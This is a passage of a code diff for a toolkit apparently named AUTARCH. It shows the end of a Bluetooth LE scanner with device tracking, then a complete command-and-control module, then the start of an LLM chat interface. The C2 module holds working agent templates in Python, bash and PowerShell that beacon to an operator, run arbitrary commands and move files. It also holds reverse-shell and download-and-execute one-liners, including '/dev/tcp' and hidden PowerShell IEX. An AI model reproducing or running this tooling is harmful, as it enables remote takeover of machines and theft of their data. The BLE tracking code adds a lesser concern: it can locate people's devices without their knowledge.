info['services'].append({'uuid': uuid, 'name': service_name})
# Manufacturer data
if hasattr(adv, 'manufacturer_data'):
for company_id, data in adv.manufacturer_data.items():
info['manufacturer'] = MANUFACTURER_IDS.get(company_id, f'ID: {company_id:#06x}')
info['manufacturer_data'] = data.hex() if isinstance(data, bytes) else str(data)
# TX Power
if hasattr(adv, 'tx_power'):
info['tx_power'] = adv.tx_power
# Classify device type
info['device_type'] = self._classify_device(info)
return info
def _classify_device(self, info: Dict) -> str:
"""Classify device type from services and name."""
name = (info.get('name') or '').lower()
services = [s['uuid'].lower() for s in info.get('services', [])]
if any('1812' in s for s in services):
return 'hid' # keyboard/mouse
if any('180d' in s for s in services):
return 'fitness'
if any('180f' in s for s in services):
if 'headphone' in name or 'airpod' in name or 'buds' in name:
return 'audio'
if any('fee0' in s for s in services):
return 'wearable'
if info.get('manufacturer') == 'Apple':
if 'watch' in name:
return 'wearable'
if 'airpod' in name:
return 'audio'
return 'apple_device'
if 'tv' in name or 'chromecast' in name or 'roku' in name:
return 'media'
if 'lock' in name or 'door' in name:
return 'smart_lock'
if 'light' in name or 'bulb' in name or 'hue' in name:
return 'smart_light'
if 'beacon' in name or any('feaa' in s for s in services):
return 'beacon'
if 'tile' in name or 'airtag' in name or 'tracker' in name:
return 'tracker'
return 'unknown'
# ── Device Detail ────────────────────────────────────────────────────
def get_device_detail(self, address: str) -> Dict:
"""Connect to device and enumerate services/characteristics."""
if not HAS_BLEAK:
return {'ok': False, 'error': 'bleak not installed'}
try:
loop = asyncio.new_event_loop()
result = loop.run_until_complete(self._async_detail(address))
loop.close()
return result
except Exception as e:
return {'ok': False, 'error': str(e)}
async def _async_detail(self, address: str) -> Dict:
"""Async device detail enumeration."""
async with BleakClient(address) as client:
services = []
for service in client.services:
svc = {
'uuid': service.uuid,
'name': KNOWN_SERVICES.get(service.uuid.lower(), service.description or service.uuid),
'characteristics': []
}
for char in service.characteristics:
ch = {
'uuid': char.uuid,
'description': char.description or char.uuid,
'properties': char.properties,
'value': None
}
# Try to read if readable
if 'read' in char.properties:
try:
val = await client.read_gatt_char(char.uuid)
ch['value'] = val.hex() if isinstance(val, bytes) else str(val)
# Try UTF-8 decode
try:
ch['value_text'] = val.decode('utf-8')
except (UnicodeDecodeError, AttributeError):
pass
except Exception:
ch['value'] = '<read failed>'
svc['characteristics'].append(ch)
services.append(svc)
return {
'ok': True,
'address': address,
'connected': True,
'services': services,
'service_count': len(services),
'char_count': sum(len(s['characteristics']) for s in services)
}
def read_characteristic(self, address: str, char_uuid: str) -> Dict:
"""Read a specific characteristic value."""
if not HAS_BLEAK:
return {'ok': False, 'error': 'bleak not installed'}
try:
loop = asyncio.new_event_loop()
result = loop.run_until_complete(self._async_read(address, char_uuid))
loop.close()
return result
except Exception as e:
return {'ok': False, 'error': str(e)}
async def _async_read(self, address: str, char_uuid: str) -> Dict:
async with BleakClient(address) as client:
val = await client.read_gatt_char(char_uuid)
return {
'ok': True,
'address': address,
'characteristic': char_uuid,
'value_hex': val.hex(),
'value_bytes': list(val),
'size': len(val)
}
def write_characteristic(self, address: str, char_uuid: str,
data: bytes) -> Dict:
"""Write to a characteristic."""
if not HAS_BLEAK:
return {'ok': False, 'error': 'bleak not installed'}
try:
loop = asyncio.new_event_loop()
result = loop.run_until_complete(self._async_write(address, char_uuid, data))
loop.close()
return result
except Exception as e:
return {'ok': False, 'error': str(e)}
async def _async_write(self, address: str, char_uuid: str, data: bytes) -> Dict:
async with BleakClient(address) as client:
await client.write_gatt_char(char_uuid, data)
return {'ok': True, 'address': address, 'characteristic': char_uuid,
'written': len(data)}
# ── Vulnerability Scanning ───────────────────────────────────────────
def vuln_scan(self, address: str = None) -> Dict:
"""Check for known BLE vulnerabilities."""
vulns = []
for vuln_name, vuln_info in KNOWN_VULNS.items():
entry = {
'name': vuln_name,
'description': vuln_info['description'],
'cve': vuln_info['cve'],
'severity': vuln_info['severity'],
'status': 'check_required',
'note': vuln_info['check']
}
vulns.append(entry)
# Device-specific checks
if address and address in self.devices:
dev = self.devices[address]
manufacturer = dev.get('manufacturer', '')
# Apple devices with older firmware
if manufacturer == 'Apple':
vulns.append({
'name': 'Apple BLE Tracking',
'description': 'Apple devices broadcast continuity messages that can be tracked',
'severity': 'info',
'status': 'detected' if 'apple_device' in dev.get('device_type', '') else 'not_applicable',
'note': 'Apple continuity protocol leaks device info'
})
# Devices without encryption
for svc in dev.get('services', []):
if 'immediate alert' in svc.get('name', '').lower():
vulns.append({
'name': 'Unauthenticated Alert Service',
'description': 'Immediate Alert service accessible without pairing',
'severity': 'low',
'status': 'detected',
'note': 'Can trigger alerts on device without authentication'
})
return {
'ok': True,
'address': address,
'vulnerabilities': vulns,
'vuln_count': len(vulns)
}
# ── Proximity Tracking ───────────────────────────────────────────────
def track_device(self, address: str) -> Dict:
"""Record RSSI for proximity tracking."""
if address not in self.devices:
return {'ok': False, 'error': 'Device not found. Run scan first.'}
dev = self.devices[address]
rssi = dev.get('rssi', 0)
tx_power = dev.get('tx_power', -59) # default TX power
# Estimate distance (rough path-loss model)
if rssi != 0:
ratio = rssi / tx_power
if ratio < 1.0:
distance = pow(ratio, 10)
else:
distance = 0.89976 * pow(ratio, 7.7095) + 0.111
else:
distance = -1
entry = {
'timestamp': datetime.now(timezone.utc).isoformat(),
'rssi': rssi,
'estimated_distance_m': round(distance, 2),
'tx_power': tx_power
}
if address not in self.tracking_history:
self.tracking_history[address] = []
self.tracking_history[address].append(entry)
return {
'ok': True,
'address': address,
'name': dev.get('name', 'Unknown'),
'current': entry,
'history_count': len(self.tracking_history[address])
}
def get_tracking_history(self, address: str) -> List[Dict]:
"""Get tracking history for a device."""
return self.tracking_history.get(address, [])
# ── Persistence ──────────────────────────────────────────────────────
def save_scan(self, name: str = None) -> Dict:
"""Save current scan results."""
name = name or f'scan_{int(time.time())}'
filepath = os.path.join(self.data_dir, f'{name}.json')
with open(filepath, 'w') as f:
json.dump({
'timestamp': datetime.now(timezone.utc).isoformat(),
'devices': list(self.devices.values()),
'count': len(self.devices)
}, f, indent=2)
return {'ok': True, 'path': filepath, 'count': len(self.devices)}
def list_scans(self) -> List[Dict]:
"""List saved scans."""
scans = []
for f in Path(self.data_dir).glob('*.json'):
try:
with open(f) as fh:
data = json.load(fh)
scans.append({
'name': f.stem,
'path': str(f),
'timestamp': data.get('timestamp', ''),
'count': data.get('count', 0)
})
except Exception:
pass
return scans
def get_devices(self) -> List[Dict]:
"""Get all discovered devices."""
return list(self.devices.values())
# ── Singleton ────────────────────────────────────────────────────────────────
_instance = None
def get_ble_scanner() -> BLEScanner:
global _instance
if _instance is None:
_instance = BLEScanner()
return _instance
# ── CLI Interface ────────────────────────────────────────────────────────────
def run():
"""CLI entry point for BLE Scanner module."""
scanner = get_ble_scanner()
while True:
status = scanner.get_status()
print(f"\n{'='*60}")
print(f" BLE Scanner (bleak: {'OK' if status['available'] else 'MISSING'})")
print(f"{'='*60}")
print(f" Devices found: {status['devices_found']}")
print()
print(" 1 — Scan for Devices")
print(" 2 — View Devices")
print(" 3 — Device Detail (connect)")
print(" 4 — Vulnerability Scan")
print(" 5 — Track Device (proximity)")
print(" 6 — Save Scan")
print(" 7 — List Saved Scans")
print(" 0 — Back")
print()
choice = input(" > ").strip()
if choice == '0':
break
elif choice == '1':
dur = input(" Scan duration (seconds, default 10): ").strip()
result = scanner.scan(float(dur) if dur else 10.0)
if result['ok']:
print(f" Found {result['count']} devices:")
for dev in result['devices']:
print(f" {dev['address']} {dev.get('name', '?'):<20} "
f"RSSI={dev['rssi']} {dev['device_type']} ({dev['manufacturer']})")
else:
print(f" Error: {result['error']}")
elif choice == '2':
devices = scanner.get_devices()
for dev in devices:
print(f" {dev['address']} {dev.get('name', '?'):<20} "
f"RSSI={dev['rssi']} {dev['device_type']}")
elif choice == '3':
addr = input(" Device address: ").strip()
if addr:
result = scanner.get_device_detail(addr)
if result['ok']:
print(f" Services: {result['service_count']} Characteristics: {result['char_count']}")
for svc in result['services']:
print(f" [{svc['name']}]")
for ch in svc['characteristics']:
val = ch.get('value_text', ch.get('value', ''))
print(f" {ch['description']} props={ch['properties']} val={val}")
else:
print(f" Error: {result['error']}")
elif choice == '4':
addr = input(" Device address (blank=general): ").strip() or None
result = scanner.vuln_scan(addr)
for v in result['vulnerabilities']:
print(f" [{v['severity']:<8}] {v['name']}: {v['description'][:60]}")
elif choice == '5':
addr = input(" Device address: ").strip()
if addr:
result = scanner.track_device(addr)
if result['ok']:
c = result['current']
print(f" RSSI: {c['rssi']} Distance: ~{c['estimated_distance_m']}m")
else:
print(f" Error: {result['error']}")
elif choice == '6':
name = input(" Scan name (blank=auto): ").strip() or None
result = scanner.save_scan(name)
print(f" Saved {result['count']} devices")
elif choice == '7':
for s in scanner.list_scans():
print(f" {s['name']} ({s['count']} devices) {s['timestamp']}")

610
modules/c2_framework.py Normal file
View File

@@ -0,0 +1,610 @@
"""AUTARCH C2 Framework
Multi-session command & control framework with agent generation,
listener management, task queuing, and file transfer.
"""
DESCRIPTION = "Command & Control framework"
AUTHOR = "darkHal"
VERSION = "1.0"
CATEGORY = "offense"
import os
import re
import json
import time
import socket
import base64
import secrets
import threading
import struct
from pathlib import Path
from datetime import datetime, timezone
from typing import Dict, List, Optional, Any
from dataclasses import dataclass, field
try:
from core.paths import get_data_dir
except ImportError:
def get_data_dir():
return str(Path(__file__).parent.parent / 'data')
# ── Agent Templates ───────────────────────────────────────────────────────────
PYTHON_AGENT_TEMPLATE = '''#!/usr/bin/env python3
"""AUTARCH C2 Agent — auto-generated."""
import os,sys,time,socket,subprocess,json,base64,platform,random
C2_HOST="{host}"
C2_PORT={port}
BEACON_INTERVAL={interval}
JITTER={jitter}
AGENT_ID="{agent_id}"
def beacon():
while True:
try:
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.settimeout(30)
s.connect((C2_HOST,C2_PORT))
# Register
info={{"id":AGENT_ID,"os":platform.system(),"hostname":socket.gethostname(),
"user":os.getenv("USER",os.getenv("USERNAME","unknown")),
"pid":os.getpid(),"arch":platform.machine()}}
s.send(json.dumps({{"type":"register","data":info}}).encode()+"\\n".encode())
while True:
data=s.recv(65536)
if not data:break
try:
cmd=json.loads(data.decode())
result=handle_cmd(cmd)
s.send(json.dumps(result).encode()+"\\n".encode())
except:pass
except:pass
finally:
try:s.close()
except:pass
jitter_delay=BEACON_INTERVAL+random.uniform(-JITTER,JITTER)
time.sleep(max(1,jitter_delay))
def handle_cmd(cmd):
t=cmd.get("type","")
if t=="exec":
try:
r=subprocess.run(cmd["command"],shell=True,capture_output=True,text=True,timeout=60)
return{{"type":"result","task_id":cmd.get("task_id",""),"stdout":r.stdout[-4096:],"stderr":r.stderr[-2048:],"rc":r.returncode}}
except Exception as e:
return{{"type":"error","task_id":cmd.get("task_id",""),"error":str(e)}}
elif t=="download":
try:
with open(cmd["path"],"rb") as f:d=base64.b64encode(f.read()).decode()
return{{"type":"file","task_id":cmd.get("task_id",""),"name":os.path.basename(cmd["path"]),"data":d}}
except Exception as e:
return{{"type":"error","task_id":cmd.get("task_id",""),"error":str(e)}}
elif t=="upload":
try:
with open(cmd["path"],"wb") as f:f.write(base64.b64decode(cmd["data"]))
return{{"type":"result","task_id":cmd.get("task_id",""),"stdout":"Uploaded to "+cmd["path"]}}
except Exception as e:
return{{"type":"error","task_id":cmd.get("task_id",""),"error":str(e)}}
elif t=="sysinfo":
return{{"type":"result","task_id":cmd.get("task_id",""),
"stdout":json.dumps({{"os":platform.system(),"release":platform.release(),
"hostname":socket.gethostname(),"user":os.getenv("USER",os.getenv("USERNAME","")),
"pid":os.getpid(),"cwd":os.getcwd(),"arch":platform.machine()}})}}
elif t=="exit":
sys.exit(0)
return{{"type":"error","task_id":cmd.get("task_id",""),"error":"Unknown command"}}
if __name__=="__main__":beacon()
'''
BASH_AGENT_TEMPLATE = '''#!/bin/bash
# AUTARCH C2 Agent — auto-generated
C2_HOST="{host}"
C2_PORT={port}
INTERVAL={interval}
AGENT_ID="{agent_id}"
while true; do
exec 3<>/dev/tcp/$C2_HOST/$C2_PORT 2>/dev/null
if [ $? -eq 0 ]; then
echo '{{"type":"register","data":{{"id":"'$AGENT_ID'","os":"'$(uname -s)'","hostname":"'$(hostname)'","user":"'$(whoami)'","pid":'$$'}}}}' >&3
while read -r line <&3; do
CMD=$(echo "$line" | python3 -c "import sys,json;d=json.load(sys.stdin);print(d.get('command',''))" 2>/dev/null)
TID=$(echo "$line" | python3 -c "import sys,json;d=json.load(sys.stdin);print(d.get('task_id',''))" 2>/dev/null)
if [ -n "$CMD" ]; then
OUTPUT=$(eval "$CMD" 2>&1 | head -c 4096)
echo '{{"type":"result","task_id":"'$TID'","stdout":"'$(echo "$OUTPUT" | base64 -w0)'"}}' >&3
fi
done
exec 3>&-
fi
sleep $INTERVAL
done
'''
POWERSHELL_AGENT_TEMPLATE = '''# AUTARCH C2 Agent — auto-generated
$C2Host="{host}"
$C2Port={port}
$Interval={interval}
$AgentId="{agent_id}"
while($true){{
try{{
$c=New-Object System.Net.Sockets.TcpClient($C2Host,$C2Port)
$s=$c.GetStream()
$w=New-Object System.IO.StreamWriter($s)
$r=New-Object System.IO.StreamReader($s)
$info=@{{type="register";data=@{{id=$AgentId;os="Windows";hostname=$env:COMPUTERNAME;user=$env:USERNAME;pid=$PID}}}}|ConvertTo-Json -Compress
$w.WriteLine($info);$w.Flush()
while($c.Connected){{
$line=$r.ReadLine()
if($line){{
$cmd=$line|ConvertFrom-Json
if($cmd.type -eq "exec"){{
try{{$out=Invoke-Expression $cmd.command 2>&1|Out-String
$resp=@{{type="result";task_id=$cmd.task_id;stdout=$out.Substring(0,[Math]::Min($out.Length,4096))}}|ConvertTo-Json -Compress
}}catch{{$resp=@{{type="error";task_id=$cmd.task_id;error=$_.Exception.Message}}|ConvertTo-Json -Compress}}
$w.WriteLine($resp);$w.Flush()
}}
}}
}}
}}catch{{}}
Start-Sleep -Seconds $Interval
}}
'''
# ── C2 Server ─────────────────────────────────────────────────────────────────
@dataclass
class Agent:
id: str
os: str = ''
hostname: str = ''
user: str = ''
pid: int = 0
arch: str = ''
remote_addr: str = ''
first_seen: str = ''
last_seen: str = ''
status: str = 'active' # active, stale, dead
@dataclass
class Task:
id: str
agent_id: str
type: str
data: dict = field(default_factory=dict)
status: str = 'pending' # pending, sent, completed, failed
result: Optional[dict] = None
created_at: str = ''
completed_at: str = ''
class C2Server:
"""Multi-session C2 server with agent management."""
def __init__(self):
self._data_dir = os.path.join(get_data_dir(), 'c2')
os.makedirs(self._data_dir, exist_ok=True)
self._agents: Dict[str, Agent] = {}
self._tasks: Dict[str, Task] = {}
self._agent_tasks: Dict[str, list] = {} # agent_id -> [task_ids]
self._agent_sockets: Dict[str, socket.socket] = {}
self._listeners: Dict[str, dict] = {}
self._listener_threads: Dict[str, threading.Thread] = {}
self._stop_events: Dict[str, threading.Event] = {}
# ── Listener Management ───────────────────────────────────────────────
def start_listener(self, name: str, host: str = '0.0.0.0',
port: int = 4444, protocol: str = 'tcp') -> dict:
"""Start a C2 listener."""
if name in self._listeners:
return {'ok': False, 'error': f'Listener "{name}" already exists'}
stop_event = threading.Event()
self._stop_events[name] = stop_event
listener_info = {
'name': name, 'host': host, 'port': port, 'protocol': protocol,
'started_at': datetime.now(timezone.utc).isoformat(),
'connections': 0,
}
self._listeners[name] = listener_info
def accept_loop():
try:
srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srv.settimeout(2.0)
srv.bind((host, port))
srv.listen(20)
listener_info['socket'] = srv
while not stop_event.is_set():
try:
conn, addr = srv.accept()
listener_info['connections'] += 1
threading.Thread(target=self._handle_agent,
args=(conn, addr, name),
daemon=True).start()
except socket.timeout:
continue
except Exception:
break
except Exception as e:
listener_info['error'] = str(e)
finally:
try:
srv.close()
except Exception:
pass
t = threading.Thread(target=accept_loop, daemon=True)
t.start()
self._listener_threads[name] = t
return {'ok': True, 'message': f'Listener "{name}" started on {host}:{port}'}
def stop_listener(self, name: str) -> dict:
"""Stop a C2 listener."""
if name not in self._listeners:
return {'ok': False, 'error': 'Listener not found'}
stop_event = self._stop_events.pop(name, None)
if stop_event:
stop_event.set()
listener = self._listeners.pop(name, {})
sock = listener.get('socket')
if sock:
try:
sock.close()
except Exception:
pass
self._listener_threads.pop(name, None)
return {'ok': True, 'message': f'Listener "{name}" stopped'}
def list_listeners(self) -> List[dict]:
return [{k: v for k, v in l.items() if k != 'socket'}
for l in self._listeners.values()]
def _handle_agent(self, conn: socket.socket, addr: tuple, listener: str):
"""Handle incoming agent connection."""
conn.settimeout(300) # 5 min timeout
try:
data = conn.recv(65536)
if not data:
return
msg = json.loads(data.decode().strip())
if msg.get('type') != 'register':
conn.close()
return
info = msg.get('data', {})
agent_id = info.get('id', secrets.token_hex(4))
agent = Agent(
id=agent_id,
os=info.get('os', ''),
hostname=info.get('hostname', ''),
user=info.get('user', ''),
pid=info.get('pid', 0),
arch=info.get('arch', ''),
remote_addr=f'{addr[0]}:{addr[1]}',
first_seen=datetime.now(timezone.utc).isoformat(),
last_seen=datetime.now(timezone.utc).isoformat(),
)
self._agents[agent_id] = agent
self._agent_sockets[agent_id] = conn
if agent_id not in self._agent_tasks:
self._agent_tasks[agent_id] = []
# Process pending tasks for this agent
while True:
pending = [t for t in self._get_pending_tasks(agent_id)]
if not pending:
time.sleep(1)
# Check if still connected
try:
conn.send(b'')
except Exception:
break
agent.last_seen = datetime.now(timezone.utc).isoformat()
continue
for task in pending:
try:
cmd = {'type': task.type, 'task_id': task.id, **task.data}
conn.send(json.dumps(cmd).encode() + b'\n')
task.status = 'sent'
# Wait for result
conn.settimeout(60)
result_data = conn.recv(65536)
if result_data:
result = json.loads(result_data.decode().strip())
task.result = result
task.status = 'completed'
task.completed_at = datetime.now(timezone.utc).isoformat()
else:
task.status = 'failed'
except Exception as e:
task.status = 'failed'
task.result = {'error': str(e)}
agent.last_seen = datetime.now(timezone.utc).isoformat()
except Exception:
pass
finally:
conn.close()
# Mark agent as stale if no longer connected
for aid, sock in list(self._agent_sockets.items()):
if sock is conn:
self._agent_sockets.pop(aid, None)
if aid in self._agents:
self._agents[aid].status = 'stale'
def _get_pending_tasks(self, agent_id: str) -> List[Task]:
task_ids = self._agent_tasks.get(agent_id, [])
return [self._tasks[tid] for tid in task_ids
if tid in self._tasks and self._tasks[tid].status == 'pending']
# ── Agent Management ──────────────────────────────────────────────────
def list_agents(self) -> List[dict]:
agents = []
for a in self._agents.values():
# Check if still connected
connected = a.id in self._agent_sockets
agents.append({
'id': a.id, 'os': a.os, 'hostname': a.hostname,
'user': a.user, 'pid': a.pid, 'arch': a.arch,
'remote_addr': a.remote_addr,
'first_seen': a.first_seen, 'last_seen': a.last_seen,
'status': 'active' if connected else a.status,
})
return agents
def remove_agent(self, agent_id: str) -> dict:
if agent_id in self._agent_sockets:
try:
self._agent_sockets[agent_id].close()
except Exception:
pass
del self._agent_sockets[agent_id]
self._agents.pop(agent_id, None)
self._agent_tasks.pop(agent_id, None)
return {'ok': True}
# ── Task Queue ────────────────────────────────────────────────────────
def queue_task(self, agent_id: str, task_type: str,
data: dict = None) -> dict:
"""Queue a task for an agent."""
if agent_id not in self._agents:
return {'ok': False, 'error': 'Agent not found'}
task_id = secrets.token_hex(4)
task = Task(
id=task_id,
agent_id=agent_id,
type=task_type,
data=data or {},
created_at=datetime.now(timezone.utc).isoformat(),
)
self._tasks[task_id] = task
if agent_id not in self._agent_tasks:
self._agent_tasks[agent_id] = []
self._agent_tasks[agent_id].append(task_id)
return {'ok': True, 'task_id': task_id}
def execute_command(self, agent_id: str, command: str) -> dict:
"""Shortcut to queue an exec task."""
return self.queue_task(agent_id, 'exec', {'command': command})
def download_file(self, agent_id: str, remote_path: str) -> dict:
return self.queue_task(agent_id, 'download', {'path': remote_path})
def upload_file(self, agent_id: str, remote_path: str,
file_data: bytes) -> dict:
encoded = base64.b64encode(file_data).decode()
return self.queue_task(agent_id, 'upload',
{'path': remote_path, 'data': encoded})
def get_task_result(self, task_id: str) -> dict:
task = self._tasks.get(task_id)
if not task:
return {'ok': False, 'error': 'Task not found'}
return {
'ok': True,
'task_id': task.id,
'status': task.status,
'result': task.result,
'created_at': task.created_at,
'completed_at': task.completed_at,
}
def list_tasks(self, agent_id: str = '') -> List[dict]:
tasks = []
for t in self._tasks.values():
if agent_id and t.agent_id != agent_id:
continue
tasks.append({
'id': t.id, 'agent_id': t.agent_id, 'type': t.type,
'status': t.status, 'created_at': t.created_at,
'completed_at': t.completed_at,
'has_result': t.result is not None,
})
return tasks
# ── Agent Generation ──────────────────────────────────────────────────
def generate_agent(self, host: str, port: int = 4444,
agent_type: str = 'python',
interval: int = 5, jitter: int = 2) -> dict:
"""Generate a C2 agent payload."""
agent_id = secrets.token_hex(4)
if agent_type == 'python':
code = PYTHON_AGENT_TEMPLATE.format(
host=host, port=port, interval=interval,
jitter=jitter, agent_id=agent_id)
elif agent_type == 'bash':
code = BASH_AGENT_TEMPLATE.format(
host=host, port=port, interval=interval,
agent_id=agent_id)
elif agent_type == 'powershell':
code = POWERSHELL_AGENT_TEMPLATE.format(
host=host, port=port, interval=interval,
agent_id=agent_id)
else:
return {'ok': False, 'error': f'Unknown agent type: {agent_type}'}
# Save to file
ext = {'python': 'py', 'bash': 'sh', 'powershell': 'ps1'}[agent_type]
filename = f'agent_{agent_id}.{ext}'
filepath = os.path.join(self._data_dir, filename)
with open(filepath, 'w') as f:
f.write(code)
return {
'ok': True,
'agent_id': agent_id,
'filename': filename,
'filepath': filepath,
'code': code,
'type': agent_type,
}
# ── One-liners ────────────────────────────────────────────────────────
def get_oneliner(self, host: str, port: int = 4444,
agent_type: str = 'python') -> dict:
"""Generate a one-liner to deploy the agent."""
if agent_type == 'python':
liner = (f"python3 -c \"import urllib.request,os,tempfile;"
f"f=tempfile.NamedTemporaryFile(suffix='.py',delete=False);"
f"f.write(urllib.request.urlopen('http://{host}:{port+1}/agent.py').read());"
f"f.close();os.system('python3 '+f.name+' &')\"")
elif agent_type == 'bash':
liner = f"bash -c 'bash -i >& /dev/tcp/{host}/{port} 0>&1 &'"
elif agent_type == 'powershell':
liner = (f"powershell -nop -w hidden -c "
f"\"IEX(New-Object Net.WebClient).DownloadString"
f"('http://{host}:{port+1}/agent.ps1')\"")
else:
return {'ok': False, 'error': 'Unknown type'}
return {'ok': True, 'oneliner': liner, 'type': agent_type}
# ── Singleton ─────────────────────────────────────────────────────────────────
_instance = None
_lock = threading.Lock()
def get_c2_server() -> C2Server:
global _instance
if _instance is None:
with _lock:
if _instance is None:
_instance = C2Server()
return _instance
# ── CLI ───────────────────────────────────────────────────────────────────────
def run():
"""Interactive CLI for C2 Framework."""
svc = get_c2_server()
while True:
print("\n╔═══════════════════════════════════════╗")
print("║ C2 FRAMEWORK ║")
print("╠═══════════════════════════════════════╣")
print("║ 1 — Start Listener ║")
print("║ 2 — Stop Listener ║")
print("║ 3 — List Agents ║")
print("║ 4 — Interact with Agent ║")
print("║ 5 — Generate Agent Payload ║")
print("║ 6 — Get One-Liner ║")
print("║ 0 — Back ║")
print("╚═══════════════════════════════════════╝")
choice = input("\n Select: ").strip()
if choice == '0':
break
elif choice == '1':
name = input(" Listener name: ").strip() or 'default'
port = int(input(" Port (4444): ").strip() or '4444')
r = svc.start_listener(name, port=port)
print(f" {r.get('message', r.get('error', ''))}")
elif choice == '2':
listeners = svc.list_listeners()
if not listeners:
print(" No listeners.")
continue
for l in listeners:
print(f" {l['name']}{l['host']}:{l['port']} ({l['connections']} connections)")
name = input(" Stop which: ").strip()
if name:
r = svc.stop_listener(name)
print(f" {r.get('message', r.get('error', ''))}")
elif choice == '3':
agents = svc.list_agents()
if not agents:
print(" No agents.")
continue
for a in agents:
print(f" [{a['status']:6s}] {a['id']}{a['user']}@{a['hostname']} "
f"({a['os']}) from {a['remote_addr']}")
elif choice == '4':
aid = input(" Agent ID: ").strip()
if not aid:
continue
print(f" Interacting with {aid} (type 'exit' to return)")
while True:
cmd = input(f" [{aid}]> ").strip()
if cmd in ('exit', 'quit', ''):
break
r = svc.execute_command(aid, cmd)
if not r.get('ok'):
print(f" Error: {r.get('error')}")
continue
# Poll for result
for _ in range(30):
time.sleep(1)
result = svc.get_task_result(r['task_id'])
if result.get('status') in ('completed', 'failed'):
if result.get('result'):
out = result['result'].get('stdout', '')
err = result['result'].get('stderr', '')
if out:
print(out)
if err:
print(f" [stderr] {err}")
break
else:
print(" [timeout] No response within 30s")
elif choice == '5':
host = input(" Callback host: ").strip()
port = int(input(" Callback port (4444): ").strip() or '4444')
atype = input(" Type (python/bash/powershell): ").strip() or 'python'
r = svc.generate_agent(host, port, atype)
if r.get('ok'):
print(f" Agent saved to: {r['filepath']}")
else:
print(f" Error: {r.get('error')}")
elif choice == '6':
host = input(" Host: ").strip()
port = int(input(" Port (4444): ").strip() or '4444')
atype = input(" Type (python/bash/powershell): ").strip() or 'python'
r = svc.get_oneliner(host, port, atype)
if r.get('ok'):
print(f"\n {r['oneliner']}\n")

270
modules/chat.py Normal file
View File

@@ -0,0 +1,270 @@
"""
AUTARCH Chat Module
Interactive chat interface for the LLM
This module provides a command-line chat interface to interact with the loaded model.
"""
import sys
from pathlib import Path
# Module metadata
DESCRIPTION = "Interactive chat with the LLM"
AUTHOR = "darkHal"
VERSION = "1.0"
CATEGORY = "core"
# Add parent directory to path
sys.path.insert(0, str(Path(__file__).parent.parent))
from core.llm import get_llm, LLMError
from core.banner import Colors, clear_screen, display_banner
class ChatInterface:
"""Interactive chat interface for AUTARCH LLM."""
COMMANDS = {
'/help': 'Show available commands',
'/clear': 'Clear conversation history',
'/history': 'Show conversation history',
'/info': 'Show model information',
'/system': 'Set system prompt (e.g., /system You are a helpful assistant)',
'/temp': 'Set temperature (e.g., /temp 0.8)',
'/tokens': 'Set max tokens (e.g., /tokens 1024)',
'/stream': 'Toggle streaming mode',
'/exit': 'Exit chat',
}
def __init__(self):
self.llm = get_llm()
self.system_prompt = "You are AUTARCH, an AI assistant created by darkHal and Setec Security Labs. You are helpful, knowledgeable, and direct in your responses."
self.streaming = True
self.temp_override = None
self.tokens_override = None
def print_status(self, message: str, status: str = "info"):
"""Print a status message."""
colors = {"info": Colors.CYAN, "success": Colors.GREEN, "warning": Colors.YELLOW, "error": Colors.RED}
symbols = {"info": "*", "success": "+", "warning": "!", "error": "X"}
print(f"{colors.get(status, Colors.WHITE)}[{symbols.get(status, '*')}] {message}{Colors.RESET}")
def print_help(self):
"""Display available commands."""
print(f"\n{Colors.BOLD}{Colors.WHITE}Available Commands:{Colors.RESET}")
print(f"{Colors.DIM}{'' * 50}{Colors.RESET}")
for cmd, desc in self.COMMANDS.items():
print(f" {Colors.CYAN}{cmd:12}{Colors.RESET} {desc}")
print()
def print_history(self):
"""Display conversation history."""
history = self.llm.get_history()
if not history:
self.print_status("No conversation history", "info")
return
print(f"\n{Colors.BOLD}{Colors.WHITE}Conversation History:{Colors.RESET}")
print(f"{Colors.DIM}{'' * 50}{Colors.RESET}")
for msg in history:
role = msg['role']
content = msg['content']
if role == 'system':
print(f"\n{Colors.MAGENTA}[System]{Colors.RESET}")
print(f" {Colors.DIM}{content[:100]}...{Colors.RESET}" if len(content) > 100 else f" {Colors.DIM}{content}{Colors.RESET}")
elif role == 'user':
print(f"\n{Colors.GREEN}[You]{Colors.RESET}")
print(f" {content}")
elif role == 'assistant':
print(f"\n{Colors.CYAN}[AUTARCH]{Colors.RESET}")
# Truncate long responses in history view
if len(content) > 200:
print(f" {content[:200]}...")
else:
print(f" {content}")
print()
def print_model_info(self):
"""Display model information."""
info = self.llm.get_model_info()
print(f"\n{Colors.BOLD}{Colors.WHITE}Model Information:{Colors.RESET}")
print(f"{Colors.DIM}{'' * 50}{Colors.RESET}")
if info['loaded']:
print(f" {Colors.CYAN}Model:{Colors.RESET} {info['model_name']}")
print(f" {Colors.CYAN}Context Size:{Colors.RESET} {info['n_ctx']}")
print(f" {Colors.CYAN}Vocabulary:{Colors.RESET} {info['n_vocab']}")
print(f" {Colors.CYAN}Streaming:{Colors.RESET} {'Enabled' if self.streaming else 'Disabled'}")
if self.temp_override:
print(f" {Colors.CYAN}Temperature:{Colors.RESET} {self.temp_override} (override)")
if self.tokens_override:
print(f" {Colors.CYAN}Max Tokens:{Colors.RESET} {self.tokens_override} (override)")
else:
print(f" {Colors.YELLOW}No model loaded{Colors.RESET}")
print()
def handle_command(self, command: str) -> bool:
"""Handle a chat command.
Args:
command: The command string.
Returns:
True if should continue chat, False if should exit.
"""
parts = command.split(maxsplit=1)
cmd = parts[0].lower()
args = parts[1] if len(parts) > 1 else ""
if cmd == '/help':
self.print_help()
elif cmd == '/clear':
self.llm.clear_history()
self.print_status("Conversation history cleared", "success")
elif cmd == '/history':
self.print_history()
elif cmd == '/info':
self.print_model_info()
elif cmd == '/system':
if args:
self.system_prompt = args
self.llm.clear_history() # Clear history when changing system prompt
self.print_status(f"System prompt set: {args[:50]}...", "success")
else:
print(f" {Colors.CYAN}Current:{Colors.RESET} {self.system_prompt}")
elif cmd == '/temp':
if args:
try:
temp = float(args)
if 0.0 <= temp <= 2.0:
self.temp_override = temp
self.print_status(f"Temperature set to {temp}", "success")
else:
self.print_status("Temperature must be between 0.0 and 2.0", "error")
except ValueError:
self.print_status("Invalid temperature value", "error")
else:
self.print_status(f"Current temperature: {self.temp_override or 'default'}", "info")
elif cmd == '/tokens':
if args:
try:
tokens = int(args)
if tokens > 0:
self.tokens_override = tokens
self.print_status(f"Max tokens set to {tokens}", "success")
else:
self.print_status("Max tokens must be positive", "error")
